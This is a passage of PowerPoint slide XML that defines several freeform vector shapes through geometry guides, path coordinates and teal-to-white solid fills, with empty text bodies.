                      <a:pt x="13" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="93CCCC"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10697" name="Freeform 104"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1230" y="2576"/>
                <a:ext cx="22" cy="84"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 22 w 22"/>
                  <a:gd name="T1" fmla="*/ 1 h 84"/>
                  <a:gd name="T2" fmla="*/ 22 w 22"/>
                  <a:gd name="T3" fmla="*/ 1 h 84"/>
                  <a:gd name="T4" fmla="*/ 21 w 22"/>
                  <a:gd name="T5" fmla="*/ 1 h 84"/>
                  <a:gd name="T6" fmla="*/ 21 w 22"/>
                  <a:gd name="T7" fmla="*/ 1 h 84"/>
                  <a:gd name="T8" fmla="*/ 19 w 22"/>
                  <a:gd name="T9" fmla="*/ 1 h 84"/>
                  <a:gd name="T10" fmla="*/ 18 w 22"/>
                  <a:gd name="T11" fmla="*/ 0 h 84"/>
                  <a:gd name="T12" fmla="*/ 17 w 22"/>
                  <a:gd name="T13" fmla="*/ 0 h 84"/>
                  <a:gd name="T14" fmla="*/ 16 w 22"/>
                  <a:gd name="T15" fmla="*/ 0 h 84"/>
                  <a:gd name="T16" fmla="*/ 15 w 22"/>
                  <a:gd name="T17" fmla="*/ 0 h 84"/>
                  <a:gd name="T18" fmla="*/ 14 w 22"/>
                  <a:gd name="T19" fmla="*/ 0 h 84"/>
                  <a:gd name="T20" fmla="*/ 11 w 22"/>
                  <a:gd name="T21" fmla="*/ 0 h 84"/>
                  <a:gd name="T22" fmla="*/ 9 w 22"/>
                  <a:gd name="T23" fmla="*/ 0 h 84"/>
                  <a:gd name="T24" fmla="*/ 8 w 22"/>
                  <a:gd name="T25" fmla="*/ 0 h 84"/>
                  <a:gd name="T26" fmla="*/ 5 w 22"/>
                  <a:gd name="T27" fmla="*/ 0 h 84"/>
                  <a:gd name="T28" fmla="*/ 3 w 22"/>
                  <a:gd name="T29" fmla="*/ 1 h 84"/>
                  <a:gd name="T30" fmla="*/ 2 w 22"/>
                  <a:gd name="T31" fmla="*/ 2 h 84"/>
                  <a:gd name="T32" fmla="*/ 0 w 22"/>
                  <a:gd name="T33" fmla="*/ 3 h 84"/>
                  <a:gd name="T34" fmla="*/ 0 w 22"/>
                  <a:gd name="T35" fmla="*/ 84 h 84"/>
                  <a:gd name="T36" fmla="*/ 0 w 22"/>
                  <a:gd name="T37" fmla="*/ 84 h 84"/>
                  <a:gd name="T38" fmla="*/ 0 w 22"/>
                  <a:gd name="T39" fmla="*/ 84 h 84"/>
                  <a:gd name="T40" fmla="*/ 1 w 22"/>
                  <a:gd name="T41" fmla="*/ 84 h 84"/>
                  <a:gd name="T42" fmla="*/ 2 w 22"/>
                  <a:gd name="T43" fmla="*/ 84 h 84"/>
                  <a:gd name="T44" fmla="*/ 3 w 22"/>
                  <a:gd name="T45" fmla="*/ 84 h 84"/>
                  <a:gd name="T46" fmla="*/ 4 w 22"/>
                  <a:gd name="T47" fmla="*/ 83 h 84"/>
                  <a:gd name="T48" fmla="*/ 5 w 22"/>
                  <a:gd name="T49" fmla="*/ 83 h 84"/>
                  <a:gd name="T50" fmla="*/ 7 w 22"/>
                  <a:gd name="T51" fmla="*/ 83 h 84"/>
                  <a:gd name="T52" fmla="*/ 9 w 22"/>
                  <a:gd name="T53" fmla="*/ 81 h 84"/>
                  <a:gd name="T54" fmla="*/ 10 w 22"/>
                  <a:gd name="T55" fmla="*/ 81 h 84"/>
                  <a:gd name="T56" fmla="*/ 12 w 22"/>
                  <a:gd name="T57" fmla="*/ 80 h 84"/>
                  <a:gd name="T58" fmla="*/ 14 w 22"/>
                  <a:gd name="T59" fmla="*/ 80 h 84"/>
                  <a:gd name="T60" fmla="*/ 16 w 22"/>
                  <a:gd name="T61" fmla="*/ 79 h 84"/>
                  <a:gd name="T62" fmla="*/ 18 w 22"/>
                  <a:gd name="T63" fmla="*/ 78 h 84"/>
                  <a:gd name="T64" fmla="*/ 19 w 22"/>
                  <a:gd name="T65" fmla="*/ 77 h 84"/>
                  <a:gd name="T66" fmla="*/ 22 w 22"/>
                  <a:gd name="T67" fmla="*/ 76 h 84"/>
                  <a:gd name="T68" fmla="*/ 22 w 22"/>
                  <a:gd name="T69" fmla="*/ 1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
                  <a:gd name="T106" fmla="*/ 0 h 84"/>
                  <a:gd name="T107" fmla="*/ 22 w 22"/>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 h="84">
                    <a:moveTo>
                      <a:pt x="22" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A8D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10698" name="Freeform 105"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1231" y="2576"/>
                <a:ext cx="17" cy="65"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 17 w 17"/>
                  <a:gd name="T1" fmla="*/ 2 h 65"/>
                  <a:gd name="T2" fmla="*/ 17 w 17"/>
                  <a:gd name="T3" fmla="*/ 2 h 65"/>
                  <a:gd name="T4" fmla="*/ 16 w 17"/>
                  <a:gd name="T5" fmla="*/ 1 h 65"/>
                  <a:gd name="T6" fmla="*/ 14 w 17"/>
                  <a:gd name="T7" fmla="*/ 1 h 65"/>
                  <a:gd name="T8" fmla="*/ 11 w 17"/>
                  <a:gd name="T9" fmla="*/ 1 h 65"/>
                  <a:gd name="T10" fmla="*/ 9 w 17"/>
                  <a:gd name="T11" fmla="*/ 0 h 65"/>
                  <a:gd name="T12" fmla="*/ 6 w 17"/>
                  <a:gd name="T13" fmla="*/ 1 h 65"/>
                  <a:gd name="T14" fmla="*/ 2 w 17"/>
                  <a:gd name="T15" fmla="*/ 2 h 65"/>
                  <a:gd name="T16" fmla="*/ 0 w 17"/>
                  <a:gd name="T17" fmla="*/ 3 h 65"/>
                  <a:gd name="T18" fmla="*/ 0 w 17"/>
                  <a:gd name="T19" fmla="*/ 65 h 65"/>
                  <a:gd name="T20" fmla="*/ 0 w 17"/>
                  <a:gd name="T21" fmla="*/ 65 h 65"/>
                  <a:gd name="T22" fmla="*/ 1 w 17"/>
                  <a:gd name="T23" fmla="*/ 65 h 65"/>
                  <a:gd name="T24" fmla="*/ 3 w 17"/>
                  <a:gd name="T25" fmla="*/ 65 h 65"/>
                  <a:gd name="T26" fmla="*/ 6 w 17"/>
                  <a:gd name="T27" fmla="*/ 64 h 65"/>
                  <a:gd name="T28" fmla="*/ 8 w 17"/>
                  <a:gd name="T29" fmla="*/ 64 h 65"/>
                  <a:gd name="T30" fmla="*/ 11 w 17"/>
                  <a:gd name="T31" fmla="*/ 63 h 65"/>
                  <a:gd name="T32" fmla="*/ 14 w 17"/>
                  <a:gd name="T33" fmla="*/ 60 h 65"/>
                  <a:gd name="T34" fmla="*/ 17 w 17"/>
                  <a:gd name="T35" fmla="*/ 58 h 65"/>
                  <a:gd name="T36" fmla="*/ 17 w 17"/>
                  <a:gd name="T37" fmla="*/ 2 h 6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65"/>
                  <a:gd name="T59" fmla="*/ 17 w 17"/>
                  <a:gd name="T60" fmla="*/ 65 h 6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65">
                    <a:moveTo>
                      <a:pt x="17" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="BCE5E5"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10699" name="Freeform 106"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1231" y="2577"/>
                <a:ext cx="14" cy="47"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 14"/>
                  <a:gd name="T1" fmla="*/ 1 h 47"/>
                  <a:gd name="T2" fmla="*/ 14 w 14"/>
                  <a:gd name="T3" fmla="*/ 1 h 47"/>
                  <a:gd name="T4" fmla="*/ 13 w 14"/>
                  <a:gd name="T5" fmla="*/ 1 h 47"/>
                  <a:gd name="T6" fmla="*/ 11 w 14"/>
                  <a:gd name="T7" fmla="*/ 1 h 47"/>
                  <a:gd name="T8" fmla="*/ 9 w 14"/>
                  <a:gd name="T9" fmla="*/ 0 h 47"/>
                  <a:gd name="T10" fmla="*/ 8 w 14"/>
                  <a:gd name="T11" fmla="*/ 0 h 47"/>
                  <a:gd name="T12" fmla="*/ 6 w 14"/>
                  <a:gd name="T13" fmla="*/ 1 h 47"/>
                  <a:gd name="T14" fmla="*/ 2 w 14"/>
                  <a:gd name="T15" fmla="*/ 1 h 47"/>
                  <a:gd name="T16" fmla="*/ 0 w 14"/>
                  <a:gd name="T17" fmla="*/ 3 h 47"/>
                  <a:gd name="T18" fmla="*/ 0 w 14"/>
                  <a:gd name="T19" fmla="*/ 47 h 47"/>
                  <a:gd name="T20" fmla="*/ 1 w 14"/>
                  <a:gd name="T21" fmla="*/ 47 h 47"/>
                  <a:gd name="T22" fmla="*/ 1 w 14"/>
                  <a:gd name="T23" fmla="*/ 45 h 47"/>
                  <a:gd name="T24" fmla="*/ 3 w 14"/>
                  <a:gd name="T25" fmla="*/ 45 h 47"/>
                  <a:gd name="T26" fmla="*/ 4 w 14"/>
                  <a:gd name="T27" fmla="*/ 45 h 47"/>
                  <a:gd name="T28" fmla="*/ 7 w 14"/>
                  <a:gd name="T29" fmla="*/ 44 h 47"/>
                  <a:gd name="T30" fmla="*/ 9 w 14"/>
                  <a:gd name="T31" fmla="*/ 44 h 47"/>
                  <a:gd name="T32" fmla="*/ 11 w 14"/>
                  <a:gd name="T33" fmla="*/ 43 h 47"/>
                  <a:gd name="T34" fmla="*/ 14 w 14"/>
                  <a:gd name="T35" fmla="*/ 41 h 47"/>
                  <a:gd name="T36" fmla="*/ 14 w 14"/>
                  <a:gd name="T37" fmla="*/ 1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47"/>
                  <a:gd name="T59" fmla="*/ 14 w 14"/>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47">
                    <a:moveTo>
                      <a:pt x="14" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="D1F2F2"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10700" name="Freeform 107"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1232" y="2578"/>
                <a:ext cx="9" cy="27"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 9 w 9"/>
                  <a:gd name="T1" fmla="*/ 1 h 27"/>
                  <a:gd name="T2" fmla="*/ 9 w 9"/>
                  <a:gd name="T3" fmla="*/ 1 h 27"/>
                  <a:gd name="T4" fmla="*/ 8 w 9"/>
                  <a:gd name="T5" fmla="*/ 1 h 27"/>
                  <a:gd name="T6" fmla="*/ 7 w 9"/>
                  <a:gd name="T7" fmla="*/ 1 h 27"/>
                  <a:gd name="T8" fmla="*/ 6 w 9"/>
                  <a:gd name="T9" fmla="*/ 0 h 27"/>
                  <a:gd name="T10" fmla="*/ 5 w 9"/>
                  <a:gd name="T11" fmla="*/ 0 h 27"/>
                  <a:gd name="T12" fmla="*/ 3 w 9"/>
                  <a:gd name="T13" fmla="*/ 0 h 27"/>
                  <a:gd name="T14" fmla="*/ 1 w 9"/>
                  <a:gd name="T15" fmla="*/ 1 h 27"/>
                  <a:gd name="T16" fmla="*/ 0 w 9"/>
                  <a:gd name="T17" fmla="*/ 2 h 27"/>
                  <a:gd name="T18" fmla="*/ 0 w 9"/>
                  <a:gd name="T19" fmla="*/ 27 h 27"/>
                  <a:gd name="T20" fmla="*/ 0 w 9"/>
                  <a:gd name="T21" fmla="*/ 27 h 27"/>
                  <a:gd name="T22" fmla="*/ 1 w 9"/>
                  <a:gd name="T23" fmla="*/ 27 h 27"/>
                  <a:gd name="T24" fmla="*/ 2 w 9"/>
                  <a:gd name="T25" fmla="*/ 27 h 27"/>
                  <a:gd name="T26" fmla="*/ 3 w 9"/>
                  <a:gd name="T27" fmla="*/ 27 h 27"/>
                  <a:gd name="T28" fmla="*/ 5 w 9"/>
                  <a:gd name="T29" fmla="*/ 26 h 27"/>
                  <a:gd name="T30" fmla="*/ 6 w 9"/>
                  <a:gd name="T31" fmla="*/ 26 h 27"/>
                  <a:gd name="T32" fmla="*/ 8 w 9"/>
                  <a:gd name="T33" fmla="*/ 25 h 27"/>
                  <a:gd name="T34" fmla="*/ 9 w 9"/>
                  <a:gd name="T35" fmla="*/ 23 h 27"/>
                  <a:gd name="T36" fmla="*/ 9 w 9"/>
                  <a:gd name="T37" fmla="*/ 1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27"/>
                  <a:gd name="T59" fmla="*/ 9 w 9"/>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27">
                    <a:moveTo>
                      <a:pt x="9" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="E5FFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10701" name="Freeform 108"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1343" y="2655"/>
                <a:ext cx="14" cy="13"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 14"/>
                  <a:gd name="T1" fmla="*/ 13 h 13"/>
                  <a:gd name="T2" fmla="*/ 8 w 14"/>
                  <a:gd name="T3" fmla="*/ 13 h 13"/>
                  <a:gd name="T4" fmla="*/ 9 w 14"/>
                  <a:gd name="T5" fmla="*/ 13 h 13"/>
                  <a:gd name="T6" fmla="*/ 10 w 14"/>
                  <a:gd name="T7" fmla="*/ 12 h 13"/>
                  <a:gd name="T8" fmla="*/ 11 w 14"/>
                  <a:gd name="T9" fmla="*/ 11 h 13"/>
                  <a:gd name="T10" fmla="*/ 13 w 14"/>
                  <a:gd name="T11" fmla="*/ 11 h 13"/>
                  <a:gd name="T12" fmla="*/ 13 w 14"/>
                  <a:gd name="T13" fmla="*/ 9 h 13"/>
                  <a:gd name="T14" fmla="*/ 14 w 14"/>
                  <a:gd name="T15" fmla="*/ 7 h 13"/>
                  <a:gd name="T16" fmla="*/ 14 w 14"/>
                  <a:gd name="T17" fmla="*/ 6 h 13"/>
                  <a:gd name="T18" fmla="*/ 14 w 14"/>
                  <a:gd name="T19" fmla="*/ 5 h 13"/>
                  <a:gd name="T20" fmla="*/ 13 w 14"/>
                  <a:gd name="T21" fmla="*/ 4 h 13"/>
                  <a:gd name="T22" fmla="*/ 13 w 14"/>
                  <a:gd name="T23" fmla="*/ 2 h 13"/>
                  <a:gd name="T24" fmla="*/ 11 w 14"/>
                  <a:gd name="T25" fmla="*/ 1 h 13"/>
                  <a:gd name="T26" fmla="*/ 10 w 14"/>
                  <a:gd name="T27" fmla="*/ 0 h 13"/>
                  <a:gd name="T28" fmla="*/ 9 w 14"/>
                  <a:gd name="T29" fmla="*/ 0 h 13"/>
                  <a:gd name="T30" fmla="*/ 8 w 14"/>
                  <a:gd name="T31" fmla="*/ 0 h 13"/>
                  <a:gd name="T32" fmla="*/ 7 w 14"/>
                  <a:gd name="T33" fmla="*/ 0 h 13"/>
                  <a:gd name="T34" fmla="*/ 6 w 14"/>
                  <a:gd name="T35" fmla="*/ 0 h 13"/>
                  <a:gd name="T36" fmla="*/ 4 w 14"/>
                  <a:gd name="T37" fmla="*/ 0 h 13"/>
                  <a:gd name="T38" fmla="*/ 3 w 14"/>
                  <a:gd name="T39" fmla="*/ 0 h 13"/>
                  <a:gd name="T40" fmla="*/ 2 w 14"/>
                  <a:gd name="T41" fmla="*/ 1 h 13"/>
                  <a:gd name="T42" fmla="*/ 1 w 14"/>
                  <a:gd name="T43" fmla="*/ 2 h 13"/>
                  <a:gd name="T44" fmla="*/ 1 w 14"/>
                  <a:gd name="T45" fmla="*/ 4 h 13"/>
                  <a:gd name="T46" fmla="*/ 0 w 14"/>
                  <a:gd name="T47" fmla="*/ 5 h 13"/>
                  <a:gd name="T48" fmla="*/ 0 w 14"/>
                  <a:gd name="T49" fmla="*/ 6 h 13"/>
                  <a:gd name="T50" fmla="*/ 0 w 14"/>
                  <a:gd name="T51" fmla="*/ 7 h 13"/>
                  <a:gd name="T52" fmla="*/ 1 w 14"/>
                  <a:gd name="T53" fmla="*/ 9 h 13"/>
                  <a:gd name="T54" fmla="*/ 1 w 14"/>
                  <a:gd name="T55" fmla="*/ 11 h 13"/>
                  <a:gd name="T56" fmla="*/ 2 w 14"/>
                  <a:gd name="T57" fmla="*/ 11 h 13"/>
                  <a:gd name="T58" fmla="*/ 3 w 14"/>
                  <a:gd name="T59" fmla="*/ 12 h 13"/>
                  <a:gd name="T60" fmla="*/ 4 w 14"/>
                  <a:gd name="T61" fmla="*/ 13 h 13"/>
                  <a:gd name="T62" fmla="*/ 6 w 14"/>
                  <a:gd name="T63" fmla="*/ 13 h 13"/>
                  <a:gd name="T64" fmla="*/ 7 w 14"/>
                  <a:gd name="T65" fmla="*/ 13 h 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
                  <a:gd name="T100" fmla="*/ 0 h 13"/>
                  <a:gd name="T101" fmla="*/ 14 w 14"/>
                  <a:gd name="T102" fmla="*/ 13 h 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 h="13">
                    <a:moveTo>
                      <a:pt x="7" y="13"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="13"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
